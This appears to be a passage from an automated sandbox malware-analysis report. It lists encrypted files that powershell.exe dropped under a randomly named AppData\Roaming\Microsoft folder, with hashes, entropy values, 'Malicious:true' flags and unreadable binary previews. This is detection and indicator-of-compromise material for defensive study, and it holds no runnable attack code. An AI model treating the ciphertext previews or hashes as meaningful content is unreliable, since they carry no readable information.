                                                                                                    Preview: y.B.f....kf...D#.&.G...%.i:bv..!..S.Lbn..t....!.....6xjus.`t...fI.hB.2.6.....4.0.E...6".../W.0kt.u.wV.]3.........!g.2 .%..m.%B.......N..R....[J...QWc]7,.z..y......8.......Fa...5.P^Ev.......b.....VpY.LF..I...D.{.=..4[.%.jN.=.......*u........aO...!.m8d..4....e.......|v.L...FqeJ@...aW.....a....m.....}...W..4..|.........x.)..4}....@.Bg.>-...T....%....$....W.G....x.@a`a.j.^}...cj..1.k..Z.!...;..w.L..~4VF.%0...&.....e.....N..)....Z..l.W.])T..YJ....fsn......4s...Y.,[.jr....7~..A$.u50....1.....".t.P.[.H........w.|...AXk..e......7.#..-..=.../..&.m...G...T....W.$..mSGucoW..i.k.i.z((.o.q9.uf.di..5p..?.-.ABaI..2K.]/.........e.,j`6..";/....J'..B.V.:".....16?..4.+..oy"..[.v.a......HH.O.2...rQ..I..&...9@.Q.V4.?....B..).`F..'...`q..D1....8...9.&.....ZI..1.{G...._.[.T..+.E.H.N.B..@.*....;..:HY.w.J'r...M...9..i..n.`.j...........CA....XL....1.Y3..2..BH.....>U./n..(q.z...m_.............K.........)1..pd.+.....1cV.y.\..g..8l...Y..Y.H.R..,.D...i.P..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PKtmvzhAfHwLQayDO.EHJOWhXcgMmyIQu
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):131570
                                                                                                    Entropy (8bit):7.9986455919199235
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:TwAzB1avSraJC3hTsRf1sMkpcNQBxD1iw:TLrraJC3hTsRf1Gpc+xP
                                                                                                    MD5:9582C735ADAB6E5DABB42150CBE097F6
                                                                                                    SHA1:C73AF442CD05EF30A8AEE6203A1150FB70928CDA
                                                                                                    SHA-256:E6E7666BEE317E23ECC789BD519DC037A62732058517EA900943F1D54766BF09
                                                                                                    SHA-512:E79C25EAAD673073233782E8FF32B355419493CEABB2FD332743286E4A9C08F79849AF015747666992050CEFB62628A2C744F018B307F409BD02059F4616F8FC
                                                                                                    Malicious:true
                                                                                                    Preview: ..**~.K.I5.$.^0..\]..gAE..i.6Z....Lh*<.WO....B.6 k....u..C.,.......q.A...].p0.e.3....).w..f.v_....,.S.`..-...+pr..G...^....,.c.{.^9....y_........@l./..7!..~....6S.+:..H.Wg...."...k..........-.;..2k...H.1...f..=..&Y&..F..J...`&.N.B.q6.'....T.p..g....?.n..Y...y4Y.O.....G>Ro..SQBeO..Q1Y.|(.<..z.....D{.eG.^..H.*j......2.x.$\.t/.O5w.M.$...8."7f.....zg2..vZ#.i^Y6... .6..r..?yA....xI..D.m#..U...>.v.......f4.......#..'..$........ ........%...Y&.%......E.....,.2.kH..13U.<..#........{c...5.l....7..w....5h..].....?JJ.....%.rT..yf.....f."....9zf.....rC....a.R.x#.......'C........O......{....Wj.B.^...\K.!....4.`.(.."?....Vs.....8q..o9...)S.M..o9A\@..V....\.'..\...TY....>..S.JW.JI...dl........-......%E....Q....A..U........C..c6.W.G.m....c...d..2 A.....~..D35.yLP..7uz.......%HOp.j"..Z..av.=...J..z.u....".T.u...8W..._...r.Pl..X..j...r.v\\..uH.........<..]?.<..s.?2..(].z.sn.O....6!5G.....i...@..v.....E@RA.......R.J.f.6X.c..2Y...(e.....b......K..a
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PbIDenfGQKx.zElKnPYTdymqjU
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):119981
                                                                                                    Entropy (8bit):7.998414444471701
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:YKjk0VTkNXgsDI4Fjk0WEa0s8+2Q6X392:YUjxMX1DI4Fo0Zat8+UA
                                                                                                    MD5:3487260482DC7DE637A50AA45B2B9328
                                                                                                    SHA1:9A6E75A3B921441348274C844D49534CD14AC41C
                                                                                                    SHA-256:012F3266A8C1D7F71106922D4C1F6AB9123CFEEAFD42B68E92E6ED51CB4A2D54
                                                                                                    SHA-512:76DCFE0645EDB90AFE40FE6EF3FF18F1C4C4338B10E2C1379A533AA56CBA74AF0B687AABCBD1C4CE9AE390FA3B94DF16D80D2FFBE813B08400D9D906BA611EAF
                                                                                                    Malicious:true
                                                                                                    Preview: .I:..v..b.0....?.....D/.#..q._..-.......c%<..P.v.e..R........o.i.sr.D....}....f0.....Y...A.D.v.........mQ......&Y..Hut..[^z..]JP.h......X.........S@....u.U.9.}A'A........0.l`r2..',...P..6d....nv..&.W......e..%U..L.@....F.....U.a....`..sA..Z..*TF.......g.+.OL.t.lf.fPq.aag$3...eG.-.....7...Y.).....2..m1..OJ*r.fW.M[...D:....N......E......6..~..aP..\....$..>H..s!\.m...A.M..>..Y........q$.}.sc..!.J.G..Nyb..Y.V&.8Y.......$G....z.*.Y.l.fVa...=d........0[=..y..^.$.N..0.%q......%K....JYn.c.9..M@..t.k..~c.XR.{|.6S....n.....[=.`...8 ..$Lk5..?....9.0Nj. ........mx......#9.s..X.s...~../..Zc.G...Q...R.k+0...,b..72...?.h.i.....VyQk.!.%.M.}F.j.....W:o.l..k......CR...=.U."....$....>....$...+...p7.S>.q.<o]..`].QA...6bv. .}...Q2..R....X.W.!.nV4.'.......t.)xM<..o......T...qd.&...R"...u..X+/4.LR..m5D2!.mv..9..vIkd......%V...m....0.iux..Ts...b..z...'.SH .N.(U........m.....?.[>zd.1.8... T.7.+..E%....l...q.@..-...?..j.%.c.~.a....hc.{..Q...r...&.g.l...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PhBMnijfgvzeWFCyu.LXQnKvNVIeqRft
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):170378
                                                                                                    Entropy (8bit):7.999038393061325
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:0zmCogHxHL6mkSbAPiJaKOdOrxNoyt0xg/PwauU66MKaHQVvBF6fOTAhQW:TgRrHtMP6SW7fw2X3aHqno
                                                                                                    MD5:6E0C90A4E7A6B13E77AA2C2E932DF6FC
                                                                                                    SHA1:6994C4F50BBF7869F62EB7772F6C9CD0CA2BC0B9
                                                                                                    SHA-256:B6F94B97EFFD00250B3A181787603948E8A9FF32E0D3E20124BCAB8C96444F44
                                                                                                    SHA-512:FB8F0AD78A7A1965E1B0D5484FD13EBFCBD8005B6C0B45BBECE77FDDA1EF06073E342D77E9350C40A923A64D7428275AF3D5D717363706DB900AA6DF9CDED4BC
                                                                                                    Malicious:true
                                                                                                    Preview: x.Ts.)7.>.`Xy.....c=.....wwX..^.-.m..i..g../I.6..<.xv....t..N.Z.*.r...I.c.}..@W'nEL...mU.og...........<-.).q.'$.Os...6...M.s.....'.A.....+....r.|D....._MR<..@az..V.2\N.%....M.....5.>^....a...c+?ru..N..d.*.a....E...p.b...D.!c...3i......Jn....P..2...........4.............9=P..E.OK.....j......!.qI.|G..N...je......F.."-......%..:...E8z.(....5.%...S.&...*.K...Q+.H.'.o..3.6.|..Kkk.>.A_.........C.......j,..J)...*..C...9Oa%<.g....m.D/d.2n.4..gY/.O...N.FU...&4p......r..|............F..l....d$`..K.wLh...].G..i.s_.....VJ....'..B.OU;.K.a#.}9...J.g`.,..!.....5.....F7.p.fw.D...L.t!.LL..a...Sm..a.".../.`.....].^U...N7Tx..P..g.......`.$.....(...q.`O.q.......N....a=".byO.2.'C...b./.../j..9&...L.K.4|..q"P.....X.JSF>.1...)S..Mq.~l)...C${D.y\D>p]..?..7.`m....3D..O....M.!..Y....:..2..4.`yB....X......nL...h...5.;N3.L.WZ.75....<_1.;.u.f..4.Y......|.U..8A.......<.*I.#.4.v..P..u......Y%d*B"..5g...<.cjy...A.w..?...:.G....k5,A...d..OJy :8...Z..`.WS...~..Z.....^#
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PhpTdsaYUALNiFDIwG.JpUwWdCOQqnhTMXxgbi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):75771
                                                                                                    Entropy (8bit):7.997457503802259
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:Xa+s08Zd5rSlUVi60X3Fy6m5ancj9Lyn7Ri8Ztwdtbeb:Xz8ZdFS8Uy3Py1iawzeb
                                                                                                    MD5:2B900AE2052AEDA995DBC10CBC42AB2D
                                                                                                    SHA1:890BFAAD2CC0CFAF49AEF6EF1F3253B3B2DF0928
                                                                                                    SHA-256:5F0CADD56598BEF91EA7B7E9EBE6E51D05BB9259EDFD04BD023F2A8F05768794
                                                                                                    SHA-512:68F70519435E958C7E1217658A43242EEB786D5B64666E17AE252F244D860BE9EB4C5C5BCB315951EA3F0D846698F53A3E098BB11EE9BD37CACD3A72581198A3
                                                                                                    Malicious:true
                                                                                                    Preview: .q...X.NX,.S..k...W)...J.\AL....g.Y..:w{>.uy/.`..&...j._.g.Sk^p.......Z..4.7..v.........Hw.d.XA.rC...y...v....5.c...L.....Jx..2]..=./?mJ./yD.../,..|......w/Y...Y1mX..4L....S...+H......f...>..2....7#.ha.o..........[... ......{.e..'.T.#.....:....F+9%....4.v.@.W..V.2Oj...l&...}..OL?l....Q/..]....0....)..yJ.c..4.M.^..e...f......+M...u3.e.X86....=N..:w..]F..D.s.A..>H.gW..U-....~.8..!z....]!..L...PI.0.r...._.....(..D.......p.._[h5.q...>.....f[...a....cA.x![L...*..D_........]G.`.]yo0.y.p.6......I....."........1../..s...hN...`M..........%0M...~.?n.[..(..E..Q.Y.*!..z...C...#.&6..Aj.N:.M1<.t.7L..bg.$..................2@-.Y+.?Z..S......6._z.M..Z;d](.z4.....Iv*G..Z....]..b..h:<.t..k.}I.... ..42@.... K../.a...B..r4...n..]J..S..'}z...k.N09.......V....0...v..cgH..7..p...4.f{{...>...tmM....kw.......v....fk..:r..#$.u...@...u.D.th..(X.....?4{..]S[.9....+..Z.&.....e.........>Y..j.).ma..-...e..e.v..X.....N....B>=.OX.m.z.8.h...3... .Zr.lWZ.qA<.Z&.).\.~m..~..q`
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PzQxGhZMRuseFjit.ryMaLfYUwEIBs
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):124206
                                                                                                    Entropy (8bit):7.998488758127075
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:EViqQhhWgeDxma4kEMHW3IB69XM6+9n3nUi0TK2o:EViqehWLxm6pB69XMHU5TKf
                                                                                                    MD5:1556B04F912C85C4ECFA02320471B833
                                                                                                    SHA1:A277182483EA011944055F5C7BA74C2F24D287D6
                                                                                                    SHA-256:1F286120035DD8B40C9EB436C492A322F0D0BA2274BC760407583EB110586E14
                                                                                                    SHA-512:DEE741B81A51D85F56FDEA64556CF5B301397ECFB81C9C2B75EA35502A9E389A66D058D61FAFA4B06A6538AC2ED84C6F1231CB398965FC9699FE5F1E5F5FF24E
                                                                                                    Malicious:true
                                                                                                    Preview: .\....C..l5...Z..#.d...j.f.._U+....E:..i]N...8Q..D...;..L../TA.....1:b..O.P..v......K....k..X.K.{._.am.t.,H.6.......KM.Bm......f\.?...so.%[Y.f.I....cm.(...uf.g...OY..0xt(0.7..W........j........U.........4^.a..J.....9...2oi.<......a......i....76.U....B..{._....@.....R.9..n..f.**...~.gfcP....N.V....%F.....;.xmF..6.....(;....|.._..X.J..ft.H.(..U.n.......\...8M.u......&...o..w.....A....?*qX.u.!...g..o......C!q8*..4\T4..{.}..M^~.6.p+.I...oE.O.iJHc.>D2...c*hR'?..D;T....`cL.+..Iu..?...dB..=\.0. ..........~.I7CT..U...8RUD-.yI.3.~ ;...IK..1...^..T...`s.;|r..U.K....UO..p...L....X....<}7....7.-G......l.0..}_b.m.W>...4.%..*.....1..\J..2.+E.C.F.y37....zY_...~o.j;.F....A..?U.......pl.........w...Tz.P..;.M:.6...}.^...J..RL.0|5_...h.RO...F....$.Z@.......`.....e.H.*L.LY...Y...A!.G...^Y.Qb..e-..S...0.}.[...Vd.!.e#.xI...8....,^E..e....6X.M.....M...."..D.N/w...0dt"....9..,....;w.BH...#.)>U..Nm....^.o...b...M1!,.D.d.i..A..~..[7..#....r%.9..K_.?..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\QbsAxtYzPFaEySJf.kQirKnpDRZz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):167160
                                                                                                    Entropy (8bit):7.998758242798626
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:Xz8ZdFS8Uy3Py1iawzeSlgDBBslul8oKAeL907aRBAh6YMROUPMMFYi:Xz8TwyfByDBsG8Vj9RRBSpupfii
                                                                                                    MD5:FFEE38B77128D830FCAB2C352FB08B8C
                                                                                                    SHA1:8BBE1F89F346C04B4CFE65EE0B3EE290F55E14AB
                                                                                                    SHA-256:26B4807704356B25970EECA58AE6C2D6CBE0AEF8A8617F93B8E4F611F38BEE75
                                                                                                    SHA-512:77FF420AF5310AA46A9D48742188DBCD5881525BA45789E03777F8843931831FE7FD98251A22882878DC0C1628B2322EBC00D46C1BE06A094AAD999600E51C2B
                                                                                                    Malicious:true
                                                                                                    Preview: .q...X.NX,.S..k...W)...J.\AL....g.Y..:w{>.uy/.`..&...j._.g.Sk^p.......Z..4.7..v.........Hw.d.XA.rC...y...v....5.c...L.....Jx..2]..=./?mJ./yD.../,..|......w/Y...Y1mX..4L....S...+H......f...>..2....7#.ha.o..........[... ......{.e..'.T.#.....:....F+9%....4.v.@.W..V.2Oj...l&...}..OL?l....Q/..]....0....)..yJ.c..4.M.^..e...f......+M...u3.e.X86....=N..:w..]F..D.s.A..>H.gW..U-....~.8..!z....]!..L...PI.0.r...._.....(..D.......p.._[h5.q...>.....f[...a....cA.x![L...*..D_........]G.`.]yo0.y.p.6......I....."........1../..s...hN...`M..........%0M...~.?n.[..(..E..Q.Y.*!..z...C...#.&6..Aj.N:.M1<.t.7L..bg.$..................2@-.Y+.?Z..S......6._z.M..Z;d](.z4.....Iv*G..Z....]..b..h:<.t..k.}I.... ..42@.... K../.a...B..r4...n..]J..S..'}z...k.N09.......V....0...v..cgH..7..p...4.f{{...>...tmM....kw.......v....fk..:r..#$.u...@...u.D.th..(X.....?4{..]S[.9....+..Z.&.....e.........>Y..j.).ma..-...e..e.v..X.....N....B>=.OX.m.z.8.h...3... .Zr.lWZ.qA<.Z&.).\.~m..~..q`
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\QhXpkEIjKSCGAfNrnoD.ZwRhpmrkqFAfTo
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):146198
                                                                                                    Entropy (8bit):7.998744732694824
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:gMCTiXIU2PceYXQFTClQoCm0CHReuu1LwFHnQaI/CTAKQz2u3rtq+Fm7c+Yg:/YAXQFOll70CHRBuRwt0HtFm7V1
                                                                                                    MD5:05782CD202E15D4DD991EE150F429706
                                                                                                    SHA1:782BBEEB6E950AE8A75D23B0D6E5C166A0D26866
                                                                                                    SHA-256:9865E4CB750C702C5E81D5DF1BDAD27D206D43088D326FC0EC13A2CCAC77BB9C
                                                                                                    SHA-512:EDB790A2315595BEE3222F5BC80B4820D8BD71D05EABF2BFAA5E3E6E5D24D455DABDF522DEABF0C256C5F8E35045A1466695499AFA116E0FC6CB76899C095B43
                                                                                                    Malicious:true
                                                                                                    Preview: ^3C.....% .L..1....a.l......4HY.v.,MM..D2..."5.6.3]Uu.,.......u...F.<....q...Z..&. 9:!..%D...L\V....&.k..f...#...`.z|E...~.'^i=.../$.Y.e.!..........t...;.....pN...p..F.\v[(.:(.s\.G..!~L...Le..K.a.&.wd.......S.B?..g...W.....A|...6.5..o...."..EJr......o..x...T."vSc..<..j.g..=U..g.w-]...E....Y".......)..wq;....J....d.:..7...:bh6..ed..3..q!...p;C-.xV..'at&'=..PN.@.a..m...Aq.h..5..z^..c2...4.73w.0U.........l..F.&.../'/%o.m....G8O>i.<.D..}BR.N.8...2.&....K.....%.1.pQVBI.<...N..mV..)..#*E.H.K,C...I`.....k.-.jk....Z..+..jW...c2...#.,.@..E.Hioz9..f..%..b5q...7...G......l.J.........T...\.....~....7XK......v........1A....t.6s]...R...@.T......a..T...J.1E,..ww..? Zh.g...1..!.zx.c..$'.......Vm..+...B...=.h..b.V..Wg...Rk5.....M..V.q.g3..cS. .r`.cY<f.u...Y_.-.......,.$.....J. ;!3j..s....UR5^.AyfO.6........!9#r...H.+6(<.K]n.a/.).........d..1.;.y..:.y...VTA....7....e..an..,.C...U.....-.\.0.. ..=.h../..!. )....s..c.....-0....2...M|vO.....b....m. ..AX..G.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\QhgrcMJXSHzINnGbdDT.NVnmCWbAGhrQ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):84052
                                                                                                    Entropy (8bit):7.997767758280846
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:y7vFRo7qKFrf3rnYI4n2KAEaMXnsKccqcfpznEmlCCCAlSNjjYINku1BD6kL:y7vbGZvranKhMXsK6cBnFECjKy/c
                                                                                                    MD5:73E9576F5EA673AA1573F6953E03B0EB
                                                                                                    SHA1:9EA9C97416640762FE0B0D68F1DE765EDBE9578B
                                                                                                    SHA-256:9CC78501AD7429504A02308645452AA30B3501844DA614D2CDC4AFEF34A2C2FA
                                                                                                    SHA-512:35F18B3B4BC5C2BF33CAF2B571B55CB3EE85018FD6537345B771E7D2A21B249701D11EC7CE2A6418A648D087E659A01CFD639F8C3C4DC6FA571B50727B22AB60
                                                                                                    Malicious:true
                                                                                                    Preview: .+......r.BN.!J..L.lAP..@.A.G..zE.S.........6.n,....CB...Zz.*.r.F.<|..p..O#.....6..6.4;..aM..yQf.2...t.u....P.....%...@}.........7..vr.D.F._hZv.|.A..*o..ea..#y6&RhBb..M.^.w..ZARY.L9.v.....v.".)B..\....C.t.o..|{[.,.*.....I.i..fcR2.?M....S.+P.....`,.*n.Q..H&a...\.I...oUr1L}...."..:J'.1..^.I.t#.T?u}9..."F..T.........T-9.....x.D..S..c....8.z...XU..!P.P....=<P..W=6.jm^.i..%.R/..#.}...H......7k.5z...th.[N+.s...x.=.:.9.B..z.N....9c...H..j83!..h@....%..b.qrV....|K..W.##......t.>5}...Et.P..Jp..]Hn......kbK......r...a#N.p...Q(...qE.(.V..~s.[..qOF.W...J^......:6..G]..T..S.U:...*.....hN.I..d8.U.Q.\jH.4....S...k..x.Z.c.......w.1G.S...._^..w.LU)KN.....?._.."z!t..m-.;.5.+....*ND.T...l~.=..|.f5.....^..I'd{iY.6?.......C2.H...}|BR...*.zz^...h......>p.C.,.]..].....o;.........\. ......%...C~....(..-)aZ+.._.e~...o.P4...Y.D.D;C!....um......2&x%..zb...}H.F....>Uyw..Ty..!.&......-.y-.....N%D..x.g.r.'.\+..P.Z*..gK.3..oo....I..7...L......&/Y\$!.vbvD..7..H:`Scy..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\QkNpehbFPBTqcWHD.NeoCKXbxqvtHSyVgM
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):122007
                                                                                                    Entropy (8bit):7.99829792551388
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:6CWMMfpELpJlLzeX5TxxGASZRLbxoZ5A7uY7lDAGfONl:6C6OfExxpOJoZ5Lyl1ful
                                                                                                    MD5:591765C53684BDAE1F142A8B70D03B19
                                                                                                    SHA1:3D5359F1CB457FF89AD8C249AEE712B0FCAA394E
                                                                                                    SHA-256:E238A5A5A48D210517B2117D58148A4CFFACA6469B432A7F54EDA7D7A6F15BCE
                                                                                                    SHA-512:8EAA1152DE24EF15FE19EAFE3E3D958E69F711D2A469D07654677F6BC7B9B99B5DC0BCF5C3F9C126B5892037DB26D1AE3241BBA9DADB702EE8E1519C0A82F313
                                                                                                    Malicious:true
                                                                                                    Preview: ...s..C64.u{.m..I...s....%.............;m..F'.J.26..k..2.`.)[.......w....8Z_..3.3....).....{.....`P._..y..3.0ZM..h'..?3.x.....CXq..[kKb#.......E9..-."..,.o.9.u...0...8.....A.........O.......\.....A.F..'.k........:...o.0.[RB....{......i...2Ck .*..d..lV...sL.N...tu0.M../3.....1U...D.....S.....8z...e...O... A.h.0..{...(F.....[... *........O'8...v{.....E..2g).\Hg&.'....ku..Z.>A.{....Rs...F.'.....N..g.,CN.b.q......"..i.C.b js.......e.$..+........+.....X...X.7..;..o.d.].#...0;...j....|.8M......I1&Q.!c.i.II.....{..3....+...u......a#"H...=2m)..+v(59...].me...,b>|..D.X9...........V..}m..G...A......-.......%.;k[....l./.@>.V..+..rT.......}..f.I.wI.;....+..*zU...g...N...g..2[.._....4UZ[..RM..B1 .L..$.,~..........pY.....#...!.)..?}...z.N..9..3..(....T.8..c...'.`../r..S..g..{.GD.g..(.s.|+..K.._R............|.f.?@..tj..x..?h...(Q.....<........x....!P..R^.F9...Y+...U...O.~........0;..H._.M.......{".2."R.n.~T0....+.[...D...l....R...;..t.RO.....M|.......X...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RAswJiTFDGOWcQ.UQAOiPrXmWVhMIs
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):93062
                                                                                                    Entropy (8bit):7.9979537709098505
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:NpYVG4A8EBLl7JtogGhHzj4xN75eIBkiw+B73H3woY/CLA0/EvFgCWHrLoICTmk:jYVXEBJJtVmzSz6w7s/LfQVCTmk
                                                                                                    MD5:A30AFEB3A3B784F77090624B93FD7CAE
                                                                                                    SHA1:582B7E83391B2D4D68CBDFBD96A76F0969066475
                                                                                                    SHA-256:8B63C5CCBE45ED19D98E09A4DCF334EF253D357C4284C348FE3014BAF08E921D
                                                                                                    SHA-512:BBB0138C3C74D9589C2CBA112290B4C025354082831EB3FDD3FCD8015589BB4D0C4F8FE7AF04E409187EE97BA4DFA88EA6E66E95DD3E68A6D5C77D5F122934AC
                                                                                                    Malicious:true
                                                                                                    Preview: ..@6./...S..)6!Dw[.....?....:G*v...f....h......J..&s.}KI.H..0..b..j..^..*../..8.V ..$..e....zB|Oh..@?.......sY...#]..c.=y...p"x.=.'....'.C..w...W.u0......6..f6......P...........#...w...^..L..I8..W? ...w>.k ..C...o...$-.$=.p7o..<.x...}..B>@.S...t...Sw|:rs4...G_$0.L._....4...:..F|<nXC.........../(..=.gs....p.[....AI9EPYAU...>v....f...>O...O.b.P....f..%..y..2.HF..A.......kb.d.8.3.+......@.k...z~...Y.|.:.2..|.....-...n..E.*G....~Tr./_.C..}+AG..q..u..x3.....F..V.A..y...|.......T*..?.....6B.I>.0.;.Ds.B\......K.q.zKa8...'..:.....p.1...A.k...3?...W.QL.."...tw..$..HN....V...u...?gU.5.t`.f$.Y.^...{c.8.^.....`e...$..R..}.<....p..........>..1.Ow.d9..e..s9w.:..H.T.=.q.*.....<H.B.6HXX..s.<0.Dir7.X......Q.i.l:}"...J.P].F.4...l.z..6.B.nf.....`..n..`........:.t.E|VG.u...+I]H.l3.+B.K......,....l.k.......WX%.`E.@.q.ny....K..h'...O+?..W.).bSz..C.n.u1.7)..Qk......t.Y.3.[....N.....r.U.....3.%..dK.+.....]..)...=u......\..H.+6.i%q...UGn....c........V.VL..B.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RBArIVNnXHyhJFkCQs.zVcHABCaPI
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):93834
                                                                                                    Entropy (8bit):7.998225979165039
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:go+jQ83attnMjRA5vkgxjNSD/GAXhl3yeRJuLYtzArvblTBEgQz5s:gnjQ83AtMW5vkiNGOIzRJWNWgQze
                                                                                                    MD5:CD9797E6ABA304D2DF16414BE8DD5996
                                                                                                    SHA1:DF6C91ADD5DCF295F3A71BA6D98B48C3EC02D0A8
                                                                                                    SHA-256:A494A7270CC67C20D0B5C76E1E54DA5AAC13BE4C2AAF35B2F8356731085EB89E
                                                                                                    SHA-512:EA76793E0744B3F4492DE17A399E55239BA82D82878C15E90FD99B559261916FA630165CDC6E688AE2E9991F23EFD8F7C1681B559C5C4E6F88CBDC1B1E16B34D
                                                                                                    Malicious:true
                                                                                                    Preview: }Ik.)/....*...k.....`...b8|."h.g...xN...&..3..[f. xh.3x.u..i..Ns....@g.y.y.(.......k.v.q.....[d.9...~M&aW.KSEP.........K........n..|y...+k+... M..DV;...[..s.=Aa0HK$).....j$...>.p..3....I.n|.-.k..(..[....}7.G.5.....:....a.H......z.d...X..B.[G!`i......$\%....}ZtV.....p,.x$X\..'R....!}......S.h...'.DM.n..^.......f..4.....pl._.p.......`.h^....D .2.\....8..m*..Z......8*..Cv...,L.,...1$.Y..b.>..e8.2....2..B..-..!=..G(..K.&.1...h.U.......,.isb..b......E....k.w..}[..cK{.eP..*.+,5..vI....@.Mu8.EU..6........9..Zv5....3.-".........%.{...b...z.g7.@i.D..l..a..g..s..5.....:.........@......n,h..Z...p.U.i.Q}..q.........|...?.<...1.~)D./...{..#vg.b.........=C.|O..A..+.@.......,.....+.yk.h`.I...M5R...Q.......e..t.x>.XvHsY..O.</u.m+F:..?..m.......2...HfN............h.E....s.Z.f..$..B.+.........\Yq.I.|..S.5..7.1.V..6E.=3.<...x.2...u.:r........v)&.li...N.M...6Ep....V`FfA.o........W_...^W9...p)C..b.."......F.c.J&.A...!.....+.c..h....4.3.....~`._`V..A...."....RU.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RIDwqQlOShWbB.DbIqQNkpiX
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):115221
                                                                                                    Entropy (8bit):7.998604662084565
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:wJpPjE4RXn6EVJPgQKiP8uonTohojJHalQhokhWi+xp/wovekffvo6AT9sqh+s62:APQgXhHVPPo/JHvhP1ovekfY6qi2
                                                                                                    MD5:4D36024C5A8134D6F5F2EC224689DA0C
                                                                                                    SHA1:07393E87A22ECB0A9C4BDB4350D48D14A26D52D7
                                                                                                    SHA-256:E7AC5AFF4F599D489008DCE7C6C764BE9F435AD3822251694D7478E9A140D2E2
                                                                                                    SHA-512:DA318DDC0A2A8713BE7872AFF4160FBE3F5D2CA6AF7AB11FC664B5DD478E74D3338B2D3507C88177F3B2A6B20B7AB332AE154481412673A9761ED93741936F5A
                                                                                                    Malicious:true
                                                                                                    Preview: .%m)........Au.t.o.. ..*..7...].....>/B...#...q.`...].UCU?...]E...r..1.nJ..5D.~S\..[.....V.Dj...U..m..>..5<...n...*>-(..p1eP.....F..C...ol.bc....D..s.,R..h..>..>....^..H..M...-eh.....v.,'.;.-..#.P;..3.....7..;@.... .=*.6.-.M.1.mD.*o...jh....R......=..6...Wz.-..^...p.. .p....R..}k...9Nv4.....W....i.<.h...x.g........L...c....-mdgp..y.bzB...t.._..'....T=`.:.K..1?.....$....a..K..Ef=..6.9<p.@87v.B...Xd..3....Mo.+..0.|.x..G..?....+.0.j:....G.....1E..H....`n.....T[.P%......Y..*..C .........G2M...g..3......... A.. .`..nwA.R...,.........E..R..?.)....t[?pE......||..f.6.^v.%...w..O...x..c..Jm.%=..9....LM......?..N..|....'....8...5.N.....!F.[..!....83..8D.*1&J..........p.......+._....so$.|..IK,1S.D.Xq6..-..{j...`F...eY..5..a.a.}rQ.6.X..)E.ll&_....k.QR.gy;..@m6....9bY..!...#r.".{.\c] .........m..|...v.y2jD.+.%.....?....:.H...g.GE._.......#A...V.=..E....J...N..A/...C.Zy....7..)...U.......U.2e.&..c<I..r...=...C....#.;.uu..:.c......S\....Bo.(.!.....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RQNTbKkeZihpqDAa.QgnobFEcuPBMRlATavD
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):187285
                                                                                                    Entropy (8bit):7.999053967908
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:qb8/lpzlu0CVzB+FJkxy/srZ2B1KzjRZEe6gdef55M6Itew6mXR:CIrkVt+oxykIivRZ+F5M/eHAR
                                                                                                    MD5:E9F3570DE18F0221A4B8B0F0A2322634
